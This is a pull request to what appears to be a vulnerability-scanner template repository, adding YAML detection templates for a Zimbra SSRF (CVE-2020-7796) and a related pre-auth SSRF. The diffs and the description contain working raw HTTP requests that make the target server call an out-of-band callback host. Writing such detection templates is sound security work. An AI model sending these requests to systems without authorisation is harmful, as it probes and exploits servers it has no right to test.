### PR TITLE
Create CVE-2020-7796.yaml

### DIFF
--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
@@ -7,7 +7,7 @@ info:
   description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
   reference: |
     - https://www.adminxe.com/2183.html
-  tags: cve,cve2020,zimbra,rce,oob
+  tags: cve,cve2020,zimbra,ssrf,oob
 
 requests:
   - raw:

--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
@@ -19,7 +19,7 @@ requests:
         Accept: */*
         Connection: keep-alive
 
-        GET /ervice/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
+        GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
         Host: {{Hostname}}
         User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
         Accept-Encoding: gzip, deflate

--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
@@ -17,7 +17,6 @@ requests:
         User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
         Accept-Encoding: gzip, deflate
         Accept: */*
-        Connection: keep-alive
 
     matchers:
       - type: word

--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
@@ -1,7 +1,7 @@
 id: CVE-2020-7796
 
 info:
-  name: Zimbra Collaboration Suite (ZCS) - Unauthenticated Remote Command Execution
+  name: Zimbra Collaboration Suite (ZCS) - SSRF
   author: gy741
   severity: critical
   description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
@@ -13,13 +13,6 @@ requests:
   - raw:
       - |
         GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
-        Host: {{Hostname}}
-        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: keep-alive
-
-        GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
         Host: {{Hostname}}
         User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
         Accept-Encoding: gzip, deflate

--- a/cves/2020/CVE-2020-7796.yaml
+++ b/cves/2020/CVE-2020-7796.yaml
@@ -1,0 +1,33 @@
+id: CVE-2020-7796
+
+info:
+  name: Zimbra Collaboration Suite (ZCS) - Unauthenticated Remote Command Execution
+  author: gy741
+  severity: critical
+  description: Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
+  reference: |
+    - https://www.adminxe.com/2183.html
+  tags: cve,cve2020,zimbra,rce,oob
+
+requests:
+  - raw:
+      - |
+        GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
+        Host: {{Hostname}}
+        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+
+        GET /ervice/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
+        Host: {{Hostname}}
+        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

--- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml
+++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml
@@ -1,0 +1,25 @@
+id: zimbra-preauth-ssrf
+
+info:
+  name: Zimbra Collaboration Suite (ZCS) - SSRF
+  author: gy741
+  severity: critical
+  reference: |
+    - https://www.adminxe.com/2183.html
+  tags: zimbra,ssrf,oob
+
+requests:
+  - raw:
+      - |
+        GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
+        Host: {{Hostname}}
+        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2020-7796 and Vulnerabilities for which CVEs do not exist.

```
Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 allows SSRF when WebEx zimlet is installed and zimlet JSP is enabled.
```

CVE-2020-7796 : 
```
        GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
        Host: {{Hostname}}
        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive

```


Vulnerabilities for which CVEs do not exist.:

```
        GET /ervice/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1
        Host: {{Hostname}}
        User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
        Accept-Encoding: gzip, deflate
        Accept: */*
        Connection: keep-alive
```

Thanks.

- References: https://www.adminxe.com/2183.html

### Template Validation

I've validated this template locally?
- [ ] YES
- [v] NO

